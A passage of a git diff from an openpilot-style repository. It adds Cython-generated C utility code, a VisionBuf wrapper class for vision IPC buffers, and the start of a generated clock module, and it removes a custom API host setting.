* sizeof(char) - 1 > 4 * PyLong_SHIFT)) { + return (char) ((((((((((char)digits[3]) << PyLong_SHIFT) | (char)digits[2]) << PyLong_SHIFT) | (char)digits[1]) << PyLong_SHIFT) | (char)digits[0]))); + } + } + break; + } + } +#endif + if ((sizeof(char) <= sizeof(long))) { + __PYX_VERIFY_RETURN_INT_EXC(char, long, PyLong_AsLong(x)) +#ifdef HAVE_LONG_LONG + } else if ((sizeof(char) <= sizeof(PY_LONG_LONG))) { + __PYX_VERIFY_RETURN_INT_EXC(char, PY_LONG_LONG, PyLong_AsLongLong(x)) +#endif + } + } + { + char val; + PyObject *v = __Pyx_PyNumber_IntOrLong(x); +#if PY_MAJOR_VERSION < 3 + if (likely(v) && !PyLong_Check(v)) { + PyObject *tmp = v; + v = PyNumber_Long(tmp); + Py_DECREF(tmp); + } +#endif + if (likely(v)) { + int ret = -1; +#if !(CYTHON_COMPILING_IN_PYPY || CYTHON_COMPILING_IN_LIMITED_API) || defined(_PyLong_AsByteArray) + int one = 1; int is_little = (int)*(unsigned char *)&one; + unsigned char *bytes = (unsigned char *)&val; + ret = _PyLong_AsByteArray((PyLongObject *)v, + bytes, sizeof(val), + is_little, !is_unsigned); +#else + PyObject *stepval = NULL, *mask = NULL, *shift = NULL; + int bits, remaining_bits, is_negative = 0; + long idigit; + int chunk_size = (sizeof(long) < 8) ? 30 : 62; + if (unlikely(!PyLong_CheckExact(v))) { + PyObject *tmp = v; + v = PyNumber_Long(v); + assert(PyLong_CheckExact(v)); + Py_DECREF(tmp); + if (unlikely(!v)) return (char) -1; + } +#if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(x) == 0) + return (char) 0; + is_negative = Py_SIZE(x) < 0; +#else + { + int result = PyObject_RichCompareBool(x, Py_False, Py_LT); + if (unlikely(result < 0)) + return (char) -1; + is_negative = result == 1; + } +#endif + if (is_unsigned && unlikely(is_negative)) { + goto raise_neg_overflow; + } else if (is_negative) { + stepval = PyNumber_Invert(v); + if (unlikely(!stepval)) + return (char) -1; + } else { + stepval = __Pyx_NewRef(v); + } + val = (char) 0; + mask = PyLong_FromLong((1L << chunk_size) - 1); if (unlikely(!mask)) goto done; + shift = PyLong_FromLong(chunk_size); if (unlikely(!shift)) goto done; + for (bits = 0; bits < (int) sizeof(char) * 8 - chunk_size; bits += chunk_size) { + PyObject *tmp, *digit; + digit = PyNumber_And(stepval, mask); + if (unlikely(!digit)) goto done; + idigit = PyLong_AsLong(digit); + Py_DECREF(digit); + if (unlikely(idigit < 0)) goto done; + tmp = PyNumber_Rshift(stepval, shift); + if (unlikely(!tmp)) goto done; + Py_DECREF(stepval); stepval = tmp; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + if (Py_SIZE(stepval) == 0) + goto unpacking_done; + #endif + } + idigit = PyLong_AsLong(stepval); + if (unlikely(idigit < 0)) goto done; + remaining_bits = ((int) sizeof(char) * 8) - bits - (is_unsigned ? 0 : 1); + if (unlikely(idigit >= (1L << remaining_bits))) + goto raise_overflow; + val |= ((char) idigit) << bits; + #if CYTHON_COMPILING_IN_LIMITED_API && PY_VERSION_HEX < 0x030B0000 + unpacking_done: + #endif + if (!is_unsigned) { + if (unlikely(val & (((char) 1) << (sizeof(char) * 8 - 1)))) + goto raise_overflow; + if (is_negative) + val = ~val; + } + ret = 0; + done: + Py_XDECREF(shift); + Py_XDECREF(mask); + Py_XDECREF(stepval); +#endif + Py_DECREF(v); + if (likely(!ret)) + return val; + } + return (char) -1; + } + } else { + char val; + PyObject *tmp = __Pyx_PyNumber_IntOrLong(x); + if (!tmp) return (char) -1; + val = __Pyx_PyInt_As_char(tmp); + Py_DECREF(tmp); + return val; + } +raise_overflow: + PyErr_SetString(PyExc_OverflowError, + "value too large to convert to char"); + return (char) -1; +raise_neg_overflow: + PyErr_SetString(PyExc_OverflowError, + "can't convert negative value to char"); + return (char) -1; +} + +/* FormatTypeName */ + #if CYTHON_COMPILING_IN_LIMITED_API +static __Pyx_TypeName +__Pyx_PyType_GetName(PyTypeObject* tp) +{ + PyObject *name = __Pyx_PyObject_GetAttrStr((PyObject *)tp, + __pyx_n_s_name_2); + if (unlikely(name == NULL) || unlikely(!PyUnicode_Check(name))) { + PyErr_Clear(); + Py_XSETREF(name, __Pyx_NewRef(__pyx_n_s__68)); + } + return name; +} +#endif + +/* CheckBinaryVersion */ + static int __Pyx_check_binary_version(void) { + char ctversion[5]; + int same=1, i, found_dot; + const char* rt_from_call = Py_GetVersion(); + PyOS_snprintf(ctversion, 5, "%d.%d", PY_MAJOR_VERSION, PY_MINOR_VERSION); + found_dot = 0; + for (i = 0; i < 4; i++) { + if (!ctversion[i]) { + same = (rt_from_call[i] < '0' || rt_from_call[i] > '9'); + break; + } + if (rt_from_call[i] != ctversion[i]) { + same = 0; + break; + } + } + if (!same) { + char rtversion[5] = {'\0'}; + char message[200]; + for (i=0; i<4; ++i) { + if (rt_from_call[i] == '.') { + if (found_dot) break; + found_dot = 1; + } else if (rt_from_call[i] < '0' || rt_from_call[i] > '9') { + break; + } + rtversion[i] = rt_from_call[i]; + } + PyOS_snprintf(message, sizeof(message), + "compile time version %s of module '%.100s' " + "does not match runtime version %s", + ctversion, __Pyx_MODULE_NAME, rtversion); + return PyErr_WarnEx(NULL, message, 1); + } + return 0; +} + +/* InitStrings */ + #if PY_MAJOR_VERSION >= 3 +static int __Pyx_InitString(__Pyx_StringTabEntry t, PyObject **str) { + if (t.is_unicode | t.is_str) { + if (t.intern) { + *str = PyUnicode_InternFromString(t.s); + } else if (t.encoding) { + *str = PyUnicode_Decode(t.s, t.n - 1, t.encoding, NULL); + } else { + *str = PyUnicode_FromStringAndSize(t.s, t.n - 1); + } + } else { + *str = PyBytes_FromStringAndSize(t.s, t.n - 1); + } + if (!*str) + return -1; + if (PyObject_Hash(*str) == -1) + return -1; + return 0; +} +#endif +static int __Pyx_InitStrings(__Pyx_StringTabEntry *t) { + while (t->p) { + #if PY_MAJOR_VERSION >= 3 + __Pyx_InitString(*t, t->p); + #else + if (t->is_unicode) { + *t->p = PyUnicode_DecodeUTF8(t->s, t->n - 1, NULL); + } else if (t->intern) { + *t->p = PyString_InternFromString(t->s); + } else { + *t->p = PyString_FromStringAndSize(t->s, t->n - 1); + } + if (!*t->p) + return -1; + if (PyObject_Hash(*t->p) == -1) + return -1; + #endif + ++t; + } + return 0; +} + +static CYTHON_INLINE PyObject* __Pyx_PyUnicode_FromString(const char* c_str) { + return __Pyx_PyUnicode_FromStringAndSize(c_str, (Py_ssize_t)strlen(c_str)); +} +static CYTHON_INLINE const char* __Pyx_PyObject_AsString(PyObject* o) { + Py_ssize_t ignore; + return __Pyx_PyObject_AsStringAndSize(o, &ignore); +} +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT +#if !CYTHON_PEP393_ENABLED +static const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + char* defenc_c; + PyObject* defenc = _PyUnicode_AsDefaultEncodedString(o, NULL); + if (!defenc) return NULL; + defenc_c = PyBytes_AS_STRING(defenc); +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + { + char* end = defenc_c + PyBytes_GET_SIZE(defenc); + char* c; + for (c = defenc_c; c < end; c++) { + if ((unsigned char) (*c) >= 128) { + PyUnicode_AsASCIIString(o); + return NULL; + } + } + } +#endif + *length = PyBytes_GET_SIZE(defenc); + return defenc_c; +} +#else +static CYTHON_INLINE const char* __Pyx_PyUnicode_AsStringAndSize(PyObject* o, Py_ssize_t *length) { + if (unlikely(__Pyx_PyUnicode_READY(o) == -1)) return NULL; +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + if (likely(PyUnicode_IS_ASCII(o))) { + *length = PyUnicode_GET_LENGTH(o); + return PyUnicode_AsUTF8(o); + } else { + PyUnicode_AsASCIIString(o); + return NULL; + } +#else + return PyUnicode_AsUTF8AndSize(o, length); +#endif +} +#endif +#endif +static CYTHON_INLINE const char* __Pyx_PyObject_AsStringAndSize(PyObject* o, Py_ssize_t *length) { +#if __PYX_DEFAULT_STRING_ENCODING_IS_ASCII || __PYX_DEFAULT_STRING_ENCODING_IS_DEFAULT + if ( +#if PY_MAJOR_VERSION < 3 && __PYX_DEFAULT_STRING_ENCODING_IS_ASCII + __Pyx_sys_getdefaultencoding_not_ascii && +#endif + PyUnicode_Check(o)) { + return __Pyx_PyUnicode_AsStringAndSize(o, length); + } else +#endif +#if (!CYTHON_COMPILING_IN_PYPY && !CYTHON_COMPILING_IN_LIMITED_API) || (defined(PyByteArray_AS_STRING) && defined(PyByteArray_GET_SIZE)) + if (PyByteArray_Check(o)) { + *length = PyByteArray_GET_SIZE(o); + return PyByteArray_AS_STRING(o); + } else +#endif + { + char* result; + int r = PyBytes_AsStringAndSize(o, &result, length); + if (unlikely(r < 0)) { + return NULL; + } else { + return result; + } + } +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrue(PyObject* x) { + int is_true = x == Py_True; + if (is_true | (x == Py_False) | (x == Py_None)) return is_true; + else return PyObject_IsTrue(x); +} +static CYTHON_INLINE int __Pyx_PyObject_IsTrueAndDecref(PyObject* x) { + int retval; + if (unlikely(!x)) return -1; + retval = __Pyx_PyObject_IsTrue(x); + Py_DECREF(x); + return retval; +} +static PyObject* __Pyx_PyNumber_IntOrLongWrongResultType(PyObject* result, const char* type_name) { + __Pyx_TypeName result_type_name = __Pyx_PyType_GetName(Py_TYPE(result)); +#if PY_MAJOR_VERSION >= 3 + if (PyLong_Check(result)) { + if (PyErr_WarnFormat(PyExc_DeprecationWarning, 1, + "__int__ returned non-int (type " __Pyx_FMT_TYPENAME "). " + "The ability to return an instance of a strict subclass of int is deprecated, " + "and may be removed in a future version of Python.", + result_type_name)) { + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; + } + __Pyx_DECREF_TypeName(result_type_name); + return result; + } +#endif + PyErr_Format(PyExc_TypeError, + "__%.4s__ returned non-%.4s (type " __Pyx_FMT_TYPENAME ")", + type_name, type_name, result_type_name); + __Pyx_DECREF_TypeName(result_type_name); + Py_DECREF(result); + return NULL; +} +static CYTHON_INLINE PyObject* __Pyx_PyNumber_IntOrLong(PyObject* x) { +#if CYTHON_USE_TYPE_SLOTS + PyNumberMethods *m; +#endif + const char *name = NULL; + PyObject *res = NULL; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_Check(x) || PyLong_Check(x))) +#else + if (likely(PyLong_Check(x))) +#endif + return __Pyx_NewRef(x); +#if CYTHON_USE_TYPE_SLOTS + m = Py_TYPE(x)->tp_as_number; + #if PY_MAJOR_VERSION < 3 + if (m && m->nb_int) { + name = "int"; + res = m->nb_int(x); + } + else if (m && m->nb_long) { + name = "long"; + res = m->nb_long(x); + } + #else + if (likely(m && m->nb_int)) { + name = "int"; + res = m->nb_int(x); + } + #endif +#else + if (!PyBytes_CheckExact(x) && !PyUnicode_CheckExact(x)) { + res = PyNumber_Int(x); + } +#endif + if (likely(res)) { +#if PY_MAJOR_VERSION < 3 + if (unlikely(!PyInt_Check(res) && !PyLong_Check(res))) { +#else + if (unlikely(!PyLong_CheckExact(res))) { +#endif + return __Pyx_PyNumber_IntOrLongWrongResultType(res, name); + } + } + else if (!PyErr_Occurred()) { + PyErr_SetString(PyExc_TypeError, + "an integer is required"); + } + return res; +} +static CYTHON_INLINE Py_ssize_t __Pyx_PyIndex_AsSsize_t(PyObject* b) { + Py_ssize_t ival; + PyObject *x; +#if PY_MAJOR_VERSION < 3 + if (likely(PyInt_CheckExact(b))) { + if (sizeof(Py_ssize_t) >= sizeof(long)) + return PyInt_AS_LONG(b); + else + return PyInt_AsSsize_t(b); + } +#endif + if (likely(PyLong_CheckExact(b))) { + #if CYTHON_USE_PYLONG_INTERNALS + if (likely(__Pyx_PyLong_IsCompact(b))) { + return __Pyx_PyLong_CompactValue(b); + } else { + const digit* digits = __Pyx_PyLong_Digits(b); + const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(b); + switch (size) { + case 2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return (Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -2: + if (8 * sizeof(Py_ssize_t) > 2 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -3: + if (8 * sizeof(Py_ssize_t) > 3 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case 4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return (Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + case -4: + if (8 * sizeof(Py_ssize_t) > 4 * PyLong_SHIFT) { + return -(Py_ssize_t) (((((((((size_t)digits[3]) << PyLong_SHIFT) | (size_t)digits[2]) << PyLong_SHIFT) | (size_t)digits[1]) << PyLong_SHIFT) | (size_t)digits[0])); + } + break; + } + } + #endif + return PyLong_AsSsize_t(b); + } + x = PyNumber_Index(b); + if (!x) return -1; + ival = PyInt_AsSsize_t(x); + Py_DECREF(x); + return ival; +} +static CYTHON_INLINE Py_hash_t __Pyx_PyIndex_AsHash_t(PyObject* o) { + if (sizeof(Py_hash_t) == sizeof(Py_ssize_t)) { + return (Py_hash_t) __Pyx_PyIndex_AsSsize_t(o); +#if PY_MAJOR_VERSION < 3 + } else if (likely(PyInt_CheckExact(o))) { + return PyInt_AS_LONG(o); +#endif + } else { + Py_ssize_t ival; + PyObject *x; + x = PyNumber_Index(o); + if (!x) return -1; + ival = PyInt_AsLong(x); + Py_DECREF(x); + return ival; + } +} +static CYTHON_INLINE PyObject * __Pyx_PyBool_FromLong(long b) { + return b ? __Pyx_NewRef(Py_True) : __Pyx_NewRef(Py_False); +} +static CYTHON_INLINE PyObject * __Pyx_PyInt_FromSize_t(size_t ival) { + return PyInt_FromSize_t(ival); +} + + +/* #### Code section: utility_code_pragmas_end ### */ +#ifdef _MSC_VER +#pragma warning( pop ) +#endif + + + +/* #### Code section: end ### */ +#endif /* Py_PYTHON_H */ diff --git a/cereal/visionipc/visionipc_pyx.pxd b/cereal/visionipc/visionipc_pyx.pxd new file mode 100644 index 000000000..6e2d5ed05 --- /dev/null +++ b/cereal/visionipc/visionipc_pyx.pxd @@ -0,0 +1,10 @@ +# distutils: language = c++ +#cython: language_level=3 + +from .visionipc cimport VisionBuf as cppVisionBuf + +cdef class VisionBuf: + cdef cppVisionBuf * buf + + @staticmethod + cdef create(cppVisionBuf*) diff --git a/cereal/visionipc/visionipc_pyx.pyx b/cereal/visionipc/visionipc_pyx.pyx index 2424af6b3..bcce534f8 100644 --- a/cereal/visionipc/visionipc_pyx.pyx +++ b/cereal/visionipc/visionipc_pyx.pyx @@ -28,6 +28,38 @@ cpdef enum VisionStreamType: VISION_STREAM_MAP +cdef class VisionBuf: + @staticmethod + cdef create(cppVisionBuf * cbuf): + buf = VisionBuf() + buf.buf = cbuf + return buf + + @property + def data(self): + return np.asarray( self.buf.addr) + + @property + def width(self): + return self.buf.width + + @property + def height(self): + return self.buf.height + + @property + def stride(self): + return self.buf.stride + + @property + def uv_offset(self): + return self.buf.uv_offset + + @property + def rgb(self): + return self.buf.rgb + + cdef class VisionIpcServer: cdef cppVisionIpcServer * server @@ -112,11 +144,15 @@ cdef class VisionIpcClient: def timestamp_eof(self): return self.extra.timestamp_eof + @property + def valid(self): + return self.extra.valid + def recv(self, int timeout_ms=100): buf = self.client.recv(&self.extra, timeout_ms) if not buf: return None - return np.asarray( buf.addr) + return VisionBuf.create(buf) def connect(self, bool blocking): return self.client.connect(blocking) diff --git a/cereal/visionipc/visionipc_pyx.so b/cereal/visionipc/visionipc_pyx.so index b01d67dd3..f4246a617 100755 Binary files a/cereal/visionipc/visionipc_pyx.so and b/cereal/visionipc/visionipc_pyx.so differ diff --git a/common/api/__init__.py b/common/api/__init__.py index 0ffbdfabb..c1fa635bd 100644 --- a/common/api/__init__.py +++ b/common/api/__init__.py @@ -5,8 +5,7 @@ from datetime import datetime, timedelta from common.basedir import PERSIST from system.version import get_version -from common.params import Params -API_HOST = os.getenv('API_HOST', 'https://api.commadotai.com') if not Params().get_bool("dp_api_custom") else Params().get("dp_api_custom_url", encoding='utf-8') +API_HOST = os.getenv('API_HOST', 'https://api.commadotai.com') class Api(): def __init__(self, dongle_id): diff --git a/common/clock.cpp b/common/clock.cpp new file mode 100644 index 000000000..c38208e6a --- /dev/null +++ b/common/clock.cpp @@ -0,0 +1,5531 @@ +/* Generated by Cython 3.0.0 */ + +/* BEGIN: Cython Metadata +{ + "distutils": { + "depends": [], + "language": "c++", + "name": "common.clock", + "sources": [ + "/data/openpilot/common/clock.pyx" + ] + }, + "module_name": "common.clock" +} +END: Cython Metadata */ + +#ifndef PY_SSIZE_T_CLEAN +#define PY_SSIZE_T_CLEAN +#endif /* PY_SSIZE_T_CLEAN */ +#if defined(CYTHON_LIMITED_API) && 0 + #ifndef Py_LIMITED_API + #if CYTHON_LIMITED_API+0 > 0x03030000 + #define Py_LIMITED_API CYTHON_LIMITED_API + #else + #define Py_LIMITED_API 0x03030000 + #endif + #endif +#endif + +#include "Python.h" +#ifndef Py_PYTHON_H + #error Python headers needed to compile C extensions, please install development version of Python. +#elif PY_VERSION_HEX < 0x02070000 || (0x03000000 <= PY_VERSION_HEX && PY_VERSION_HEX < 0x03030000) + #error Cython requires Python 2.7+ or Python 3.3+. +#else +#define CYTHON_ABI "3_0_0" +#define __PYX_ABI_MODULE_NAME "_cython_" CYTHON_ABI +#define __PYX_TYPE_MODULE_PREFIX __PYX_ABI_MODULE_NAME "." +#define CYTHON_HEX_VERSION 0x030000F0 +#define CYTHON_FUTURE_DIVISION 1 +#include +#ifndef offsetof + #define offsetof(type, member) ( (size_t) & ((type*)0) -> member ) +#endif +#if !defined(_WIN32) && !defined(WIN32) && !defined(MS_WINDOWS) + #ifndef __stdcall + #define __stdcall + #endif + #ifndef __cdecl + #define __cdecl + #endif + #ifndef __fastcall + #define __fastcall + #endif +#endif +#ifndef DL_IMPORT + #define DL_IMPORT(t) t +#endif +#ifndef DL_EXPORT + #define DL_EXPORT(t) t +#endif +#define __PYX_COMMA , +#ifndef HAVE_LONG_LONG + #define HAVE_LONG_LONG +#endif +#ifndef PY_LONG_LONG + #define PY_LONG_LONG LONG_LONG +#endif +#ifndef Py_HUGE_VAL + #define Py_HUGE_VAL HUGE_VAL +#endif +#if defined(GRAALVM_PYTHON) + /* For very preliminary testing purposes. Most variables are set the same as PyPy. + The existence of this section does not imply that anything works or is even tested */ + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 1 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 0 + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PYPY_VERSION) + #define CYTHON_COMPILING_IN_PYPY 1 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 0 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #if PY_VERSION_HEX < 0x03050000 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #elif !defined(CYTHON_USE_ASYNC_SLOTS) + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #undef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 1 + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS (PY_MAJOR_VERSION >= 3) + #endif + #if PY_VERSION_HEX < 0x03090000 + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #elif !defined(CYTHON_PEP489_MULTI_PHASE_INIT) + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 0 + #undef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE (PY_VERSION_HEX >= 0x030400a1 && PYPY_VERSION_NUM >= 0x07030C00) + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(CYTHON_LIMITED_API) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 1 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #undef CYTHON_CLINE_IN_TRACEBACK + #define CYTHON_CLINE_IN_TRACEBACK 0 + #undef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 0 + #undef CYTHON_USE_TYPE_SPECS + #define CYTHON_USE_TYPE_SPECS 1 + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #undef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 0 + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #undef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #endif + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #undef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 0 + #undef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 0 + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_GIL + #define CYTHON_FAST_GIL 0 + #undef CYTHON_METH_FASTCALL + #define CYTHON_METH_FASTCALL 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP487_INIT_SUBCLASS + #define CYTHON_PEP487_INIT_SUBCLASS 1 + #endif + #undef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 0 + #undef CYTHON_USE_MODULE_STATE + #define CYTHON_USE_MODULE_STATE 1 + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 + #ifndef CYTHON_UPDATE_DESCRIPTOR_DOC + #define CYTHON_UPDATE_DESCRIPTOR_DOC 0 + #endif +#elif defined(PY_NOGIL) + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 0 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 1 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #undef CYTHON_USE_PYTYPE_LOOKUP + #define CYTHON_USE_PYTYPE_LOOKUP 0 + #ifndef CYTHON_USE_ASYNC_SLOTS + #define CYTHON_USE_ASYNC_SLOTS 1 + #endif + #undef CYTHON_USE_PYLIST_INTERNALS + #define CYTHON_USE_PYLIST_INTERNALS 0 + #ifndef CYTHON_USE_UNICODE_INTERNALS + #define CYTHON_USE_UNICODE_INTERNALS 1 + #endif + #undef CYTHON_USE_UNICODE_WRITER + #define CYTHON_USE_UNICODE_WRITER 0 + #undef CYTHON_USE_PYLONG_INTERNALS + #define CYTHON_USE_PYLONG_INTERNALS 0 + #ifndef CYTHON_AVOID_BORROWED_REFS + #define CYTHON_AVOID_BORROWED_REFS 0 + #endif + #ifndef CYTHON_ASSUME_SAFE_MACROS + #define CYTHON_ASSUME_SAFE_MACROS 1 + #endif + #ifndef CYTHON_UNPACK_METHODS + #define CYTHON_UNPACK_METHODS 1 + #endif + #undef CYTHON_FAST_THREAD_STATE + #define CYTHON_FAST_THREAD_STATE 0 + #undef CYTHON_FAST_PYCALL + #define CYTHON_FAST_PYCALL 0 + #ifndef CYTHON_PEP489_MULTI_PHASE_INIT + #define CYTHON_PEP489_MULTI_PHASE_INIT 1 + #endif + #ifndef CYTHON_USE_TP_FINALIZE + #define CYTHON_USE_TP_FINALIZE 1 + #endif + #undef CYTHON_USE_DICT_VERSIONS + #define CYTHON_USE_DICT_VERSIONS 0 + #undef CYTHON_USE_EXC_INFO_STACK + #define CYTHON_USE_EXC_INFO_STACK 0 +#else + #define CYTHON_COMPILING_IN_PYPY 0 + #define CYTHON_COMPILING_IN_CPYTHON 1 + #define CYTHON_COMPILING_IN_LIMITED_API 0 + #define CYTHON_COMPILING_IN_GRAAL 0 + #define CYTHON_COMPILING_IN_NOGIL 0 + #ifndef CYTHON_USE_TYPE_SLOTS + #define CYTHON_USE_TYPE_SLOTS 1 + #endif + #ifndef CYTHON_USE_TYPE_SPECS + #define 